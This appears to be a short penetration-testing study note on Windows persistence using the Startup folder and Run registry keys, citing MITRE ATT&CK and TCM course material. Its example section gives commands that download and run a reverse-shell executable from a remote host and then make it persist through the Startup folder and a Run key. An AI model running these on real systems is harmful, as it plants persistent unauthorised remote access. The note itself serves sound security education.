Run on boot

StartUp folder

The startup folder path for the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup.

The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.

Registry key

The following run keys are created by default on Windows systems:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

Example

# Gaining foothold
wget http://192.168.0.12:8000/reverse.exe -o $env:TEMP\jkr.exe; Invoke-Item $env:TEMP\jkr.exe
 
# Adding malware to the user start menu folder
msf> cd "C:\Users\talion\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
msf> cp $env:TEMP\jkr.exe .
 
# Add key to registry
msf> New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name jkr -Value "C:\Users\talion\AppData\Roaming\Microsoft\Windows\Start Menu\Progra  ms\jkr.exe" -PropertyType String -Force
 
# print new registry entries
msf> Get-ChildItem -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\'

Resources

MITRE ATT&CK - Boot or Logon Autostart Execution : https://attack.mitre.org/techniques/T1547/001/
TCM - Startup persistence : https://academy.tcm-sec.com/courses/1444641/lectures/33152746
TCM - Autorun persistence : https://academy.tcm-sec.com/courses/1444641/lectures/33152747

Hugo Perinazzo

Explorer

Run on boot

StartUp folder

Registry key

Example

Resources

Graph View

Table of Contents

Backlinks